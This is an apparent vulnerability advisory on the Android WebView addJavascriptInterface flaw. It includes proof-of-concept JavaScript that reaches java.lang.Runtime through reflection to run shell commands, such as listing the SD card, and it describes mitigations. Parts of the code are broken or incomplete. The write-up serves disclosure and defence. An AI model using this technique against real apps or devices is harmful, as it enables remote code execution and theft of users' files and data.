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Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface met…

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Vulnerability Description

A lot of the time we use WebView to display a Webpage,for example many applications in order to achieve the server control, many results page is Webpage, rather than the local implementation, which has many advantages, such as interface change does not need to release a new version, directly modify the line at Server end. With Webpage to display interface, usually are more or less with the Java code have interaction, such as a button click Webpage above, we need to know the button click event, or we have to call a method, make the page to perform some action, in order to achieve these interactions, we usually use JS to achieve, while WebView has provided such a method, the specific usage is as follows:

    mWebView.addJavascriptInterface(new JSInterface(), "jsInterface");

We asked WebView to register a name "jsInterface" of the object, and then can access to the jsInterface object in JS, you can invoke some methods of the object, the final call to Java code, so as to realize the interaction of JS and Java code. We work together to have a look on the addJavascriptInterface method on the Android website description:

This method can be used to allow JavaScript to control the host application. This is a powerful feature, but also presents a security risk for applications targeted to API level JELLYBEAN or below, because JavaScript could use reflection to access an injected object's public fields. Use of this method in a WebView containing untrusted content could allow an attacker to manipulate the host application in unintended ways, executing Java code with the permissions of the host application. Use extreme care when using this method in a WebView which could contain untrusted content.

JavaScript interacts with Java object on a private, background thread of this WebView. Care is therefore required to maintain thread safety. The Java object's fields are not accessible.

Simply put, is to use addJavascriptInterface may lead to insecurity, because JS may contain malicious code. This loophole and today we want to say is this, when JS contains malicious code, it can do anything.

Vulnerablity Impact:

Through the JavaScript, anything can access the device on the SD card, and even contact information, SMS etc.. It's disgusting, quack.

  1. WebView adds a JavaScript object, and the current application with SDCard read and write permissions, or: android.permission.WRITE_EXTERNAL_STORAGE

  2. Through the window object can be found in JS, the object "getClass" method, and then through the reflection mechanism, get the Runtime object, then call the static method to run some commands, such as access to the file command.

  3. The string returned from the execution command input stream, you can get the information of the file name. Then do what you want to do, good risk. The core JS code as follows:

      function execute(cmdArgs)  
         for (var obj in window) {  
            if ("getClass" in window[obj]) {  
             return  window[obj].getClass().forName("java.lang.Runtime")  


In order to prove this loophole, I'm just loading a malicious JS code of the local Webpage, HTML the code as follows:

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  
      var i=0;  
      function getContents(inputStream)  
        var contents = ""+i;  
        var b =;  
        var i = 1;  
        while(b != -1) {  
            var bString = String.fromCharCode(b);  
            contents += bString;  
            contents += "\n"  
            b =;  
        return contents;  
       function execute(cmdArgs)  
        for (var obj in window) {  
            if ("getClass" in window[obj]) {  
                return window[obj].getClass().forName("java.lang.Runtime").  
      var p = execute(["ls","/mnt/sdcard/"]);  
    <script language="javascript">  
      function onButtonClick()   
        // Call the method of injected object from Android source.  
        var text = jsInterface.onButtonClick("Text passed in from the JS!!!");  
      function onImageClick()   
        //Call the method of injected object from Android source.  
        var src = document.getElementById("image").src;  
        var width = document.getElementById("image").width;  
        var height = document.getElementById("image").height;  
        // Call the method of injected object from Android source.  
        jsInterface.onImageClick(src, width, height);  
      <p>Click on the image to the URL to Java code</p>  
      <img class="curved_box" id="image"   
    <button type="button" onclick="onButtonClick()">Interaction with the Java code</button>  
  1. Please seeexecute()The method, which the traversal of all window object, an object with a getClass method and then find, use this object class, find the java.lang.Runtime object, then call the "getRuntime" static method to get an instance of Runtime, and then call exec () method to execute a command.
  2. getContents()Methods, read from the stream, displayed in the interface.
  3. Key code is in the following sentences

return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);

Java code is as follows:

mWebView = (WebView) findViewById(;  
mWebView.addJavascriptInterface(new JSInterface(), "jsInterface");  

Need to add permissions:

<uses-permission android:name="android.permission.INTERNET"/>  
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />  
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />  


  • System Android 4.2 or above In Android 4.2 or above, Google was modified, the statement on the Java remote method of a @JavascriptInterface, as in the following code:

    class JsObject {
    public String toString() { return "injectedObject"; }
    webView.addJavascriptInterface(new JsObject(), "injectedObject");
    webView.loadData("", "text/html", null);

  • System Android 4.2 below

This problem is difficult to solve, but also can not solve. First of all, we must not call the addJavascriptInterface method. On this issue, the core is to know the JS event this one action, JS interacts with Java we know, there are several, than the prompt, alert, such action would correspond toWebChromeClientMethod, the corresponding class for prompt, which corresponds to theonJsPromptMethod, this method statement as follows:

public boolean onJsPrompt(WebView view, String url, String message,   
    String defaultValue, JsPromptResult result)  

By this method, JS can make information (text) transfer to Java, and Java also can get information (text) is transmitted to the JS.


Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface met…






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